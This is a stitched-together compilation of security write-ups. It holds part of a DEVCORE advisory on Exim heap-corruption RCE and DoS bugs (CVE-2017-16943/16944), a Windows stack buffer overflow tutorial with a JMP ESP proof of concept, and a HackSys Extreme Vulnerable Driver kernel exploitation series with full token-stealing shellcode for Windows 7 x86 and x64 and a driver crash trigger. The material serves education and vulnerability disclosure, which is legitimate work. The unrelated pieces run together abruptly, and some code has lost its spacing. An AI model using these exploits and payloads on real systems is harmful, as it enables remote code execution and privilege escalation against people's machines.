In this way, while we keep sending huge messages, current_block gets freed after the extension. In the malloc.c of glibc (so called ptmalloc2), system manages a linked list of freed memory chunks, which is called unsorted bin. Freed chunks are put into unsorted bin if it is not the last chunk on the heap. In step 2, dkim_exim_verify_init allocated chunks after next->text. Therefore, this chunk is put into unsorted bin and the pointers of linked list are stored into the first 16 bytes of chunk (on x86-64). The location written is exactly current_block->next, and therefore current_block->next is overwritten to unsorted bin inside main_arena of libc (linked list pointer fd points back to unsorted bin if no other freed chunk exists).
Keep sending msg for the next extension
When the next extension occurs, store_get tries to cut from main_arena, which makes attackers able to overwrite all global variables below main_arena.
Overwrite global variables in libc
Finish sending message and trigger free()
In the PoC, we simply modified __free_hook and ended the line. Exim calls store_reset to reset the buffer and calls __free_hook in free(). At this stage, we successfully controlled instruction pointer $rip.
However, this is not enough for an RCE because the arguments are uncontrollable. As a result, we improved this PoC to modify both __free_hook and _IO_2_1_stdout_. We forged the vtable of stdout and set __free_hook to any call of fflush(stdout) inside exim. When the program calls fflush, it sets the first argument to stdout and jumps to a function pointer on the vtable of stdout. Hence, we can control both $rip and the content of first argument.
We consulted past CVE exploits and decided to call expand_string, which executes command with execv if we set the first argument to ${run{cmd}}, and finally we got our RCE.
Exploit for default configured exim
When dkim is disabled, the PoC above fails because current_block is the last chunk on heap. This makes the system merge it into a big chunk called top chunk rather than unsorted bin.
The illustrations below describe the difference of heap layout:
To avoid this, we need to make exim allocate and free some memories before we actually start our exploitation. Therefore, we add some steps between step 1 and step 2.
After running out of current_block:
Use DATA command to send lots of data
Send huge data, make the chunk big and extend many times. After several extension, it calls store_get to retrieve a bigger store and then releases the old one. This repeats many times if the data is long enough. Therefore, we have a big chunk in unsorted bin.
End DATA transfer and start a new email
Restart to send an email with BDAT command after the heap chunk is prepared.
Adjust yield_length again
Send invalid command with an unprintable charater again to cut the current_block.
Finally the heap layout is like:
And now we can go back to the step 2 at the beginning and create the same situation. When next->text is freed, it goes back to unsorted bin and we are able to overwrite libc global variables again.
The following is the PoC for default configured exim:
A demo of our exploit is as below.
Note that we have not found a way to leak memory address and therefore we use heap spray instead. It requires another information leakage vulnerability to overcome the PIE mitigation on x86-64.
Incorrect BDAT data handling leads to DoS
Vulnerability Analysis
When receiving data with BDAT command, SMTP server should not consider a single dot ‘.’ in a line to be the end of message. However, we found exim does in receive_msg when parsing header. Like the following output:
220 devco.re ESMTP Exim 4.90devstart_213-7c6ec81-XX Mon, 27 Nov 2017 16:58:20 +0800
EHLO test
250-devco.re Hello root at test
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN CRAM-MD5
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
MAIL FROM:<[email protected]>
250 OK
RCPT TO:<[email protected]>
250 Accepted
BDAT 10
.
250- 10 byte chunk, total 0
250 OK id=1eJFGW-000CB0-1R
As we mentioned before, exim uses function pointers to switch input source. This bug makes exim go into an incorrect state because the function pointer receive_getc is not reset. If the next command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to stack exhaustion.
smtp_in.c: 546 bdat_getc
if (chunking_data_left > 0)
return lwr_receive_getc(chunking_data_left--);
This is not enough to pose a threat because exim runs a fork server. After a further analysis, we made exim go into an infinite loop without crashing, using the following commands.
25 November, 2017 16:27 CVE-2017-16943 Patch released
28 November, 2017 16:27 CVE-2017-16944 Patch released
3 December, 2017 13:15 Send an advisory release notification to Exim and wait for reply until now
Remarks
While we were trying to report these bugs to exim, we could not find any method for security report. Therefore, we followed the link on the official site for bug report and found the security option. Unexpectedly, the Bugzilla posts all bugs publicly and therefore the PoC was leaked. Exim team responded rapidly and improved their security report process by adding a notification for security reports in reaction to this.
Credits
Vulnerabilities found by Meh, DEVCORE research team.
meh [at] devco [dot] re
In the first part of this article, we discussed about the basics that we need to have in order to properly understand this type of vulnerability. As we went through how the compiling process works, how assembly looks like and how the stack works, we can go further and explore how a Stack Based Buffer Overflow vulnerability can be exploited.
Introduction
We previously discussed that the stack (during a function call) contains the following (in the below order, where the “local variables” are stored at the “smallest address” and “function parameters” are stored at the highest address):
Local variables of the function (for example 20 bytes)
Previous EBP value (to create the stack frame, saved with PUSH EBP)
Return address (placed on the stack by the CALL instruction)
Parameters of the function (placed on the stack using PUSH instructions)
If you can understand those things, it is easy to understand the Stack Based Buffer Overflow vulnerability. Let’s take the following example. We have the following function, called from “main” function:
#define _CRT_SECURE_NO_WARNINGS
#include "stdafx.h"
#include <stdio.h>
#include <string.h>
// Function that displays the name
void Display(char *p_pcName)
{
// Buffer (local variable) that will store the name
char buffer[20];
// We copy the name in buffer
strcpy(buffer, p_pcName);
// Display the name
printf("Hello: %s", buffer);
}
// Main function
int main()
{
Display("111122223333");
}
The program is very simple: it calls the “Display” function with the specified parameter.
We can see the problem here:
char buffer[20];
strcpy(buffer, p_pcName);
We have a local variable, buffer, which can store up to 20 bytes.
It is important to note that “char buffer[20]” is different from “char *buffer=(char*)malloc(20)” or “char *buffer=new char[20]“. Our version specifies that the buffer has 20 bytes which can be direclty allocated on the stack, it is a local variable that can store 20 bytes. The other two versions will dynamically allocate the space for the buffer, but the data will be stored on other memory region called “HEAP“, not on the stack. By the way, there are also “Heap Based Buffer Overflows“, but they are more complicated.
Having a local variable that can store 20 bytes on the stack, we will copy the string specified from the command line in that memory location. What happens if the length of the string received from command line is more that 20? We have a “buffer overflow”. The name of “Stack Based Buffer Overflow” comes from the fact that the buffer is stored on the stack.
Let’s see how the code is compiled. Please note that if you use a modern version of Visual Studio, you might get a totally different result. In order to keep everything simple, we should remove from project settings all optimizations, security features and functionalities that we don’t need.
As you can see, everything is as expected: there is only a PUSH for the “111122223333” string parameter, a function call and the stack is cleaned.
000E1000 | 55 | push ebp |
000E1001 | 8B EC | mov ebp,esp |
000E1003 | 83 EC 14 | sub esp,14 | Allocate space on the stack for the buffer
000E1006 | 8B 45 08 | mov eax,dword ptr ss:[ebp+8] | Get in EAX the string parameter address
000E1009 | 50 | push eax | Place it on the stack (second parameter)
000E100A | 8D 4D EC | lea ecx,dword ptr ss:[ebp-14] | Get in EAX the address of the "buffer"
000E100D | 51 | push ecx | Place it on the stack (first parameter)
000E100E | E8 06 0C 00 00 | call <sbof.strcpy> | Call strcpy(buffer, p_pcName);
000E1013 | 83 C4 08 | add esp,8 | Clean the stack
000E1016 | 8D 55 EC | lea edx,dword ptr ss:[ebp-14] | Get in EAX the address of the "buffer"
000E1019 | 52 | push edx | Place it on the stack (second parameter)
000E101A | 68 00 30 0E 00 | push sbof.E3000 | "Hello: %s" string
000E101F | E8 6C 00 00 00 | call <sbof.printf> | Call printf("Hello: %s", buffer);
000E1024 | 83 C4 08 | add esp,8 | Clean the stack
000E1027 | 8B E5 | mov esp,ebp |
000E1029 | 5D | pop ebp |
000E102A | C3 | ret |
The function allocates space for 20 bytes (0x14 in hexadecimal) and calls two functions:
strcpy – with two parameters: the buffer and our string (111122223333)
printf – with two parameters: “Hello, %s” string and our string (111122223333)
Let’s see how the stack will look AFTER the strcpy function call, so after “add esp, 8” instruction:
00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 770F8600 | The buffer has 20 bytes allocated, but there can be any data
00B9FEE0 | 000E12F7 | And those 8 bytes have junk data, as "111122223333" has 12 bytes and we allocated 20
00B9FEE4 | 00B9FEF0 | EBP saved on Display function first instruction
00B9FEE8 | 000E103D | Return address, the instruction after "call Display"
00B9FEEC | 000E300C | "111122223333" parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function
As you can see, first 20 bytes (first 5 lines) represent the content of the “buffer”. We specified a string of 12 bytes (“111122223333”) and the rest of the string has junk data (it is not initialized with NULLs). However, please note that after “3333”, we have the following data: 770F8600. Last byte is a NULL byte and it was added by the “strcpy” function.
Now we can ask the question: “What will happen if the string parameter is longer than 20 bytes”? As you can probably guess, the answer is “We get a stack based buffer overflow”.
Exploitation
Let’s get back to the stack and see what we have there:
The “buffer” (20 bytes)
The Display function’s EBP
The Return Address
The parameter (the string)
What can go wrong? Let’s remember what will happen when a fuction returns (on RETN instruction): the execution continues from the “Return Address”. So, if we overflow the stack and overwrite the “Return Address” with someting else… we can control the execution of the program!
This is what will happen if we will use a string parameter of 28 bytes, instead of the maximum number of 20.
We will modify the call “Display(“111122223333”);” to “Display(“1111222233334444555566667777”);“. The stack will look like this:
00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 34343434 | "4444"
00B9FEE0 | 35353535 | "5555"
00B9FEE4 | 36363636 | "6666" - EBP saved on Display function first instruction
00B9FEE8 | 37373737 | "7777" - Return address, the instruction after "call Display"
00B9FEEC | 000E300C | "111122223333" parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function
This means, that when the execution of the “Display” function will be finished (at the RETN instruction), de execution will jump to the address “0x37373737”. So, in conclusion, the EIP value will be 0x37373737, a value that we control.
After the RETN instruction, the return address will be removed from the stack. This means that the top of the stack, the ESP register, will point to the address: 0x00B9FEEC. We can see that if we use a string larger than 28 bytes (20 bytes buffer + 4 bytes saved EBP + 4 bytes return address) we will overwrite data on stack. Since the ESP value will point to something that we control, how can we easily execute arbitrary code?
There are two things we control:
The return address (EIP)
The data at the top of the stack (ESP)
The easiest solution will be to find a “JMP ESP” instruction. For example, let’s assume that the code of our program, or one of the DLLs, have a JMP ESP instruction at address 0x12345678. What we will do, will be to replace the return address with the address of this instruction (0x012345678) instead of “0x37373737” and we can redirect the execution of the program to the top of the stack, where we can place any code and do whatever we want with the program!
Let’s open the program in x64dbg, an open-source debugger. A debugger is a program that allows you to open a program and step through instructions, allowing you to see at runtime the contents of the memory or the registers values. It is a powerful tool with mutiple features. Looking at the top of SBOF.exe program, we can see our two functions. Below is a screenshot.
Click each “PUSH EBP” instructions at the beginning of the functions and press F2. This will place a breakpoint, so when you will run the program in the debugger, it will stop at those instructions. You can also use F7 to stept each instruction or F8 to step each instruction, but on CALL instructions, jump over the function call, do not dig into that one. Pressing F9 will run the program, and the debugger will stop at the selected breakpoints, or if some error will happen. It would be very useful to play around with the debugger to see how powerful are its features.
Now, in order to keep the things simple, we will modify the code to contain the “JMP ESP” instruction. We will add the following function:
// Function that does nothing, just contain jmo
void Nothing()
{
__asm
{
jmp esp;
}
}
As you can see in the debugger, the program contains also some other instructions and it uses DLLs (such as kernel32.dll, ntdll.dll) which also contain a lot of code. We can use all this code to search for a JMP ESP instruction inside it. Right click, go to “Search for” > “All Modules” > “Command”, type “jmp esp” and press OK.
In our case, with the new function that contains the “JMP ESP” instruction, we can find it at the following address:
01371033 | FF E4 | jmp esp |
Please note that you might have totally different addresses since modern operating systems, for security reasons, randomize the memory addresses, you will find more details later, in this article.
So, in order to create a working proof of concept, we will have to do the following, to create the following string:
First 20 bytes will be the buffer
Second 4 bytes will overwrite the saved EBP
Following 4 bytes will be 0x01371033 – the address of the JMP ESP instuction
The next bytes will represent the code we want to execute
So, let’s change the main function to the following:
int main()
{
Display("111122223333444455556666\x33\x10\x37\x01\xcc\xcc\xcc\xcc");
}
As you can see, we have in our string, the 0x01371033 address, but it is in reverse order! This is because the data is stored as “little endian” in memory, as we discussed in the first part of the article. The following “cc”s, represent the “INT 3” instruction, an instruction that will pause the debugger like we set a breakpoint.
We can replace this with a shellcode. A shellcode is a special code, most of the time written in Assembly, that compiled, it works directly. Normal machine code will not work, because the strings for example are placed in different memory regions and the code knows the addresses of the functions, for a shellcode, the strings will be placed in the same place as the code and the shellcode will find itself the addresses of the functions. If you want to know in detail how a shellcode works on Windows and how you can manually write one, I recommend you the following articles:
Please note that all this data must not contain a NULL byte. As the vulnerable call is a call to “strcpy” function, the “strcpy” function will stop execution when it will encounter the first NULL byte and we will not have all the data copied.
Now, when we will execute this program, this will happen:
We exploited it! This is the result of the copied shellcode. We managed to execute arbitrary code, code that we supplied and got full access to the execution of the program.
Now, you might think this is not a useful example. Of course it is not, it is for educational purposes. A program might get the string from the command line, or from the network, and the same thing might happen. Here are some common cases where this vulnerability might be present:
Getting data from the command line
Parsing a document (such as XML, HTML, PDF)
Reading data from the network (such as a FTP server, HTTP server)
Protection mechanisms
There are a few protections build to pretect against this type of attacks. All modern compilers and operating systems should have them.
DEP – Data Execution Prevention – Is a protection mechanism that works at both hardware level (NX bit – “No eXecute”) and software level and it does not allow the execution of code from the memory regions that do not the have the “execute” permissions. A memory page can have “read”, “write” and/or “execute” permissions. For example, e memory region containing data, such as strings can have “read” or “read-write” permissions, and a memory region containing code will have “read-execute” permissions. The stack, read-write permissions, is a memory region where it shuld not exist the possibility to execute code from. However, without DEP protection, this is possible, and DEP will protect against execution of code from the stack. As you can probably understand, our shellcode was executed from the stack and this protection will block our attack. It can be enabled in the compiler from “Configuration Properties” > “Linker” > “Advaned” > “Data Execution Prevention (DEP)”.
ALSR – Address Space Layour Randomization, which was introduced in Windows Vista and it is the reason why it is easier to understand this vulnerability on Windows XP, is another protection mechanism that can protect against this type of attacks. As we discussed, the DLL’s and the executable can contain different instructions, such as “JMP ESP” that attackers can use. Before ASLR, the executable and the DLLs where always loaded in memory at the same address. For example, the SBOF.exe code would always start at 0x10002000 and kernel32.dll might be loaded always at some address. This means that attackers can use the instructions from those binaries. But with ASLR, all modules, and also the stack and the heap memory, will be loaded at random addresses. This way, we can find the address of a JMP ESP instruction, but it will not work on other machine as the address will be different (randomly generated), since the module containing the instruction was loaded at a different memory address. It is possible to activate this feature from “Configuration Properties” > “Linker” > “Advaned” > “Randomized Base Address”.
Stack Cookies – This is another protection mechanism, specially build against this type of attacks, and it is offered by the compiler. This works by placing at the beginning of a function a random value called “stack cookie”, before the local variables of the function (such as our buffer). What will happen in a stack based buffer oveflow, will be to overwrite the data following the buffer, and this will also overwrite this random variable. This protection, before the “RETN” instructions, will check the value of the randomly generated stack cookie. If a stack based buffer overflow will occur, the value will be changed and this verification will fail, so the program will forcely stop execution and the shellcode will not be executed. This protection can be configured from “Configuration Properties” > “C/C++” > “Code Generation” > “Security Check”.
Conclusion
Even if it is not difficult to understand this type of vulnerability, the main difficulty is to learn a few concepts such as Assembly language and how programs work under the hood. Due to existing protection mechanisms, a real-life exploitation of this type of attack is way more difficult. However, there are a few tricks that can be used in certain situations to bypass some of protections (if other are not present) but this is not the purpose of this article.
My suggestion, in order to properly understand this vulnerability, would be to compile a program like this, disable all protections and see what happens. You can modify the size of the buffer but the most important is to go instruction with instruction and understand everything with all the details. You can download the source code from the above example from here.
If you have any questions, please leave a comment here and use the contact email.
This N-part tutorial will walk you through the kernel exploit development cycle. It’s important to notice that we will be dealing with known vulnerabilities, no reversing is needed (for the driver at least).
By the end of tutorial, you should be familiar with common vulnerability classes and how they’re exploited, able to port exploits from x86 to x64 arch (if possible) and be familiar with newer mitigations in Windows 10.
What’s kernel debugging?
Unlike user-mode debugging where you can pause execution of a single process, kernel-mode debugging breaks on the entire system, meaning you won’t be able to use it at all. A debugger machine is needed so you can communicate with the debuggee, observe memory or kernel data structures, or catch a crash.
The main goal is to gain execution with kernel-mode context. A successful exploit could result in elevated permissions and what you can do is only bound by your imagination (anywhere from cool homebrew to APT-sponsored malware).
Goal for this tutorial is getting a shell with SYSTEM permissions.
How will this tutorial be organized?
Part 1: Setting up the environment
Configure the 3 VMs + debuggee machine.
Configure WinDBG.
Part 2: Payloads
Placeholder for common payloads to be used later, this will allow us to focus on vulnerability-specific details in future posts and refer to this post when needed.
Part 3-N:
One or more post per vulnerability.
Kernel exploit development lifecycle
Finding a vulnerability: This won’t be covered in this tutorial as we already know exactly where the vulnerabilities are.
Hijacking execution flow: Some vulnerabilities allow code execution, others require more than that.
Privilege escalation: Main goal will be to get a shell with SYSTEM privileges.
Restore execution flow: Uncaught exceptions in kernel-mode result in a system crash. Unless a DoS exploit makes you sleep at night we need to address this.
What are the targets?
Exploitation will be attempted on the following targets (no specific version is needed yet):
a Win7 x86 VM
a Win7 x64 VM
a Win10 x64 VM
Normally we’ll start with the x86 machine, followed by porting it to the Win7 x64 one. Some exploits won’t run on the Win10 machine due to some newer mitigations that are added. We’ll either have to tweak the exploit or come up with an entirely different approach.
The debuggee is our guinea pig. We’ll use it to load the vulnerable driver and communicate with it. This machine will crash a lot as most exceptions in kernel will result in BSOD. Make sure you give it enough RAM.
Per debuggee:
Inside the VirtualKD folder, run target\vminstall.exe. This will add a boot entry that has debugging enabled and connects automatically to the VirtualKD server on the debugger machine.
For the Windows 10 VM, you need to enable test signing. This allows you to load unsigned drivers into the kernel.
Running bcdedit /set testsinging on and rebooting will show “Test Mode” on the desktop.
NOTE: Windows 10 supports communicating through the network and in my experience is usually faster. To do that, follow this.
Run the OSR Driver Loader, register the service then start it. You may need to reboot.
Optional: Install VM guest additions.
Set up a low-priv account, this should be used while exploiting.
C:\Windows\system32>net user low low /add
The command completed successfully.
Setting up the debugger machine
This machine will be the one debugging the debuggee machine through WinDBG. You’ll be able to inspect memory and data structures and manipulate them if needed. Having a remote debugging session running when the debuggee crashes allows us to break into the VM and/or analyze a crash.
VirtualKD host will automatically communicate with a named pipe instead of setting it up manually. If you’re network debugging the Win10 VM, you’ll need to test the connection manually.
Install the Windows SDK (link). You can select the “Debugging Tools for Windows” only.
Verify that WinDBG is installed, Win10 SDK is by default installed in C:\Program Files (x86)\Windows Kits\10\Debuggers.
Add it to the system path and set up the debugger path in VirtualKD.
Reboot one of the debuggee machines while the VirtualKD host is running on the debugger. You should be able to start a WinDBG session.
Setting up WinDBG
If everything is set up correctly, WinDBG will pause execution and print some info about the debuggee.
Symbols contain debugging information for lots of Windows binaries. We can get them by executing the following:
NTSTATUSDriverEntry(INPDRIVER_OBJECTDriverObject,INPUNICODE_STRINGRegistryPath){UINT32i=0;PDEVICE_OBJECTDeviceObject=NULL;NTSTATUSStatus=STATUS_UNSUCCESSFUL;UNICODE_STRINGDeviceName,DosDeviceName={0};UNREFERENCED_PARAMETER(RegistryPath);PAGED_CODE();RtlInitUnicodeString(&DeviceName,L"\\Device\\HackSysExtremeVulnerableDriver");RtlInitUnicodeString(&DosDeviceName,L"\\DosDevices\\HackSysExtremeVulnerableDriver");// Create the device
Status=IoCreateDevice(DriverObject,0,&DeviceName,FILE_DEVICE_UNKNOWN,FILE_DEVICE_SECURE_OPEN,FALSE,&DeviceObject);...}
This routine contains an IoCreateDevice call that contains the driver name we’ll be using to communicate with it.
DriverObject will get populated with necesarry structures and function pointers.
In HEVD, this function is called IrpDeviceIoCtlHandler and it’s basically a large switch case for every IOCTL. Ever vulnerability has a unique IOCTL.
Example: HACKSYS_EVD_IOCTL_STACK_OVERFLOW is the IOCTL used to trigger the stack overflow vulnerability.
That’s it! Next post will discuss payloads. For now, it’ll only include a generic token-stealing payload that’ll be used for part 3.
I’m aware this post doesn’t cover lots of issues you can run into. Due to the scope of this tutorial, you’ll need to figure out a lot on your own, but you’re welcome to comment with your questions if needed.
Sometimes you’re able to control the return address of a function, in this case you can point it to your user-mode buffer only if SMEP is disabled.
Payloads have to reside in an executable memory segment. If you define it as a read-only hex string or any other combination that doesn’t have execute permissions, shellcode execution will fail due to DEP (Data Execution Prevention).
Payloads are in assembly. Unless you enjoy copying hex strings, I recommend compiling ASM on the fly in a Visual Studio project. This works for x86 and x64 payloads and saves you the headache of removing function prologues/epilogues, creating a RWX buffer and copying shellcode or not being able to write x64 ASM inline.
Lots of other options exist like 1) using masm and copying shellcode to a RWX buffer at runtime, 2) using a naked function but that’s only for x86 or 3) inline ASM which again works only for x86.
Every Windows process is represented by an EPROCESS structure.
dt nt!_EPROCESS optional_process_address
Most of EPROCESS structures exist in kernel-space, PEB exists in user-space so user-mode code can interact with it. This stucture can be shown using dt nt!_PEB optional_process_address or !peb if you’re in a process context.
kd> !process 0 0 explorer.exe
PROCESS ffff9384fb0c35c0
SessionId: 1 Cid: 0fc4 Peb: 00bc3000 ParentCid: 0fb4
DirBase: 3a1df000 ObjectTable: ffffaa88aa0de500 HandleCount: 1729.
Image: explorer.exe
kd> .process /i ffff9384fb0c35c0
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff802`80002c60 cc int 3
kd> !peb
PEB at 0000000000bc3000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
...
EPROCESS structure contains a Token field that tells the system what privileges this process holds. A privileged process (like System) is what we aim for. If we’re able to steal this token and overwrite the current process’s token with that value, current process will run with higher privileges than it’s intented to. This is called privilege escalation/elevation.
Offsets differ per operating system, you’ll need to update payloads with the appropriate values. WinDBG is your friend.
Token Stealing Payload
Imagine we can execute any code we want with the goal of replacing the current process token with a more privileged one, where do we go? PCR struct is an excellent option for us as its location doesn’t change. With some WinDBG help we’ll be able to find the EPROCESS of the current process and replace its token with that of System (PID 4).
More of the same, EPROCESS address is at _KTHREAD.ApcState.Process.
5. Locating SYSTEM EPROCESS
Using _EPROCESS.ActiveProcessLinks.Flink linked list we’re able to iterate over processes. Every iteration we need to check if UniqueProcessId equals 4 as that’s the System process PID.
6. Replacing the token
If it’s a match we overwrite the target process Token with that of SYSTEM.
Notice that Token is of type _EX_FAST_REF and the lower 4 bits aren’t part of it.
Normally you want to keep that value when replacing the token, but I haven’t run into issues for not replacing it before.
Token Stealing Payload Windows 7 x86 SP1
.386.modelflat,c; cdecl / stdcallASSUMEFS:NOTHING.codePUBLICStealTokenStealTokenprocpushad; Save registers state; Start of Token Stealing Stubxoreax,eax; Set ZEROmoveax,DWORDPTRfs:[eax+124h]; Get nt!_KPCR.PcrbData.CurrentThread; _KTHREAD is located at FS : [0x124]moveax,[eax+50h]; Get nt!_KTHREAD.ApcState.Processmovecx,eax; Copy current process _EPROCESS structuremovedx,04h; WIN 7 SP1 SYSTEM process PID = 0x4SearchSystemPID:moveax,[eax+0B8h]; Get nt!_EPROCESS.ActiveProcessLinks.Flinksubeax,0B8hcmp[eax+0B4h],edx; Get nt!_EPROCESS.UniqueProcessIdjneSearchSystemPIDmovedx,[eax+0F8h]; Get SYSTEM process nt!_EPROCESS.Tokenmov[ecx+0F8h],edx; Replace target process nt!_EPROCESS.Token; with SYSTEM process nt!_EPROCESS.Token; End of Token Stealing StubStealTokenENDPend
Token Stealing Payload Windows 7 x64
.codePUBLICGetTokenGetTokenproc; Start of Token Stealing Stubxorrax,rax; Set ZEROmovrax,gs:[rax+188h]; Get nt!_KPCR.PcrbData.CurrentThread; _KTHREAD is located at GS : [0x188]movrax,[rax+70h]; Get nt!_KTHREAD.ApcState.Processmovrcx,rax; Copy current process _EPROCESS structuremovr11,rcx; Store Token.RefCntandr11,7movrdx,4h; WIN 7 SP1 SYSTEM process PID = 0x4SearchSystemPID:movrax,[rax+188h]; Get nt!_EPROCESS.ActiveProcessLinks.Flinksubrax,188hcmp[rax+180h],rdx; Get nt!_EPROCESS.UniqueProcessIdjneSearchSystemPIDmovrdx,[rax+208h]; Get SYSTEM process nt!_EPROCESS.Tokenandrdx,0fffffffffffffff0horrdx,r11mov[rcx+208h],rdx; Replace target process nt!_EPROCESS.Token; with SYSTEM process nt!_EPROCESS.Token; End of Token Stealing StubGetTokenENDPend
NTSTATUSTriggerStackOverflow(INPVOIDUserBuffer,INSIZE_TSize){NTSTATUSStatus=STATUS_SUCCESS;ULONGKernelBuffer[BUFFER_SIZE]={0};PAGED_CODE();__try{// Verify if the buffer resides in user mode
ProbeForRead(UserBuffer,sizeof(KernelBuffer),(ULONG)__alignof(KernelBuffer));DbgPrint("[+] UserBuffer: 0x%p\n",UserBuffer);DbgPrint("[+] UserBuffer Size: 0x%X\n",Size);DbgPrint("[+] KernelBuffer: 0x%p\n",&KernelBuffer);DbgPrint("[+] KernelBuffer Size: 0x%X\n",sizeof(KernelBuffer));#ifdef SECURE
// Secure Note: This is secure because the developer is passing a size
// equal to size of KernelBuffer to RtlCopyMemory()/memcpy(). Hence,
// there will be no overflow
RtlCopyMemory((PVOID)KernelBuffer,UserBuffer,sizeof(KernelBuffer));#else
DbgPrint("[+] Triggering Stack Overflow\n");// Vulnerability Note: This is a vanilla Stack based Overflow vulnerability
// because the developer is passing the user supplied size directly to
// RtlCopyMemory()/memcpy() without validating if the size is greater or
// equal to the size of KernelBuffer
RtlCopyMemory((PVOID)KernelBuffer,UserBuffer,Size);#endif
}__except(EXCEPTION_EXECUTE_HANDLER){Status=GetExceptionCode();DbgPrint("[-] Exception Code: 0x%X\n",Status);}returnStatus;}
TriggerStackOverflow is called via StackOverflowIoctlHandler, which is the IOCTL handler for HACKSYS_EVD_IOCTL_STACK_OVERFLOW.
Vulnerability is fairly obvious, a user supplied buffer is copied into a kernel buffer of size 2048 bytes (512 * sizeof(ULONG)). No boundary check is being made, so this is a classic stack smashing vulnerability.
2. Triggering the crash
#include <Windows.h>
#include <stdio.h>
// IOCTL to trigger the stack overflow vuln, copied from HackSysExtremeVulnerableDriver/Driver/HackSysExtremeVulnerableDriver.h
#define HACKSYS_EVD_IOCTL_STACK_OVERFLOW CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_NEITHER, FILE_ANY_ACCESS)
intmain(){// 1. Create handle to driver
HANDLEdevice=CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL|FILE_FLAG_OVERLAPPED,NULL);printf("[+] Opened handle to device: 0x%x\n",device);// 2. Allocate memory to construct buffer for device
char*uBuffer=(char*)VirtualAlloc(NULL,2200,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);printf("[+] User buffer allocated: 0x%x\n",uBuffer);RtlFillMemory(uBuffer,2200,'A');DWORDbytesRet;// 3. Send IOCTL
DeviceIoControl(device,HACKSYS_EVD_IOCTL_STACK_OVERFLOW,uBuffer,2200,NULL,0,&bytesRet,NULL);}
Now compile this code and copy it over to the VM. Make sure a WinDBG session is active and run the executable from a shell. Machine should freeze and WinDBG should (okay, maybe will) flicker on your debugging machine.
HEVD shows you debugging info with verbose debugging enabled:
Enter k to show the stack trace, you should see something similar to this:
kd> k
# ChildEBP RetAddr
00 8c812d0c 8292fce7 nt!RtlpBreakWithStatusInstruction
01 8c812d5c 829307e5 nt!KiBugCheckDebugBreak+0x1c
02 8c813120 828de3c1 nt!KeBugCheck2+0x68b
03 8c8131a0 82890be8 nt!MmAccessFault+0x104
04 8c8131a0 82888ff3 nt!KiTrap0E+0xdc
05 8c813234 93f666be nt!memcpy+0x33
06 8c813a98 41414141 HEVD!TriggerStackOverflow+0x94 [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 92]
WARNING: Frame IP not in any known module. Following frames may be wrong.
07 8c813aa4 41414141 0x41414141
08 8c813aa8 41414141 0x41414141
09 8c813aac 41414141 0x41414141
0a 8c813ab0 41414141 0x41414141
0b 8c813ab4 41414141 0x41414141
If you continue execution, 0x41414141 will be popped into EIP. That wasn’t so complicated :)
3. Controlling execution flow
Exploitation is straightforward with a token-stealing payload described in part 2. The payload will be constructed in user-mode and its address passed as the return address. When the function exists, execution is redirected to the user-mode buffer. This is called a privilege escalation exploit as you’re executing code with higher privileges than you’re supposed to have.
Since SMEP is not enabled on Windows 7, we can point jump to a payload in user-mode and get it executed with kernel privileges.
Now restart the vm .reboot and let’s put a breakpoint at function start and end. To know where the function returns, use uf and calculate the offset.
We now know that the return address is stored 2076 bytes away from the start of the kernel buffer!
The big question is, where should you go after payload is executed?
4. Cleanup
Let’s re-think what we’re doing. Overwriting the return address of the first function on the stack means this function’s remaining instructions won’t be reached. In our case, this function is StackOverflowIoctlHandler at offset 0x1e.
Only two missing instructions need to be executed at the end of our payload:
9176b718popebp9176b719ret8
We’re still missing something. This function expects a return value in @eax, anything other than 0 will be treated as a failure, so let’s fix that before we execute the prologue.
xoreax,eax; Set NTSTATUS SUCCEESS
The full exploit can be found here. Explanation of payload here.
5. Porting the exploit to Windows 7 64-bit
Porting this one is straightforward:
Offset to kernel buffer becomes 2056 instead of 2076.
A user-supplied buffer is being copied to a kernel buffer without boundary check, resulting in a class stack smashing vulnerability.
Function return address is controllable and can be pointed to a user-mode buffer as SMEP is not enabled.
Payload has to exist in an R?X memory segment, otherwise DEP will block the attempt.
No exceptions can be ignored, which means we have to patch the execution path after payload is executed. In our case that consisted of 1) setting the return value to 0 in @eax and 2) execute the remaining instructions in StackOverflowIoctlHandler before returning.
That’s it! Part 4 will be exploiting this on Windows 10 with SMEP bypass!
Part 3 showed how exploitation is done for the stack buffer overflow vulnerability on a Windows 7 x86/x64 machine. This part will target Windows 10 x64, which has SMEP enabled by default on it.
Windows build: 16299.15.amd64fre.rs3_release.170928-1534
ntoskrnl’s version: 10.0.16288.192
Instead of mouthfeeding you the problem, let’s run the x64 exploit on the Windows 10 machine and see what happens.
kd> bu HEVD!TriggerStackOverflow + 0xc8
kd> g
Breakpoint 1 hit
HEVD!TriggerStackOverflow+0xc8:
fffff801`7c4d5708 ret
kd> k
# Child-SP RetAddr Call Site
00 ffffa308`83dfe798 00007ff6`8eff11d0 HEVD!TriggerStackOverflow+0xc8 [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 101]
01 ffffa308`83dfe7a0 ffffd50f`91a47110 0x00007ff6`8eff11d0
02 ffffa308`83dfe7a8 00000000`00000000 0xffffd50f`91a47110
Examining the instructions at 00007ff68eff11d0 verifies that it’s our payload. What would go wrong?
kd> t
00007ff6`8eff11d0 xor rax,rax
kd> t
KDTARGET: Refreshing KD connection
*** Fatal System Error: 0x000000fc
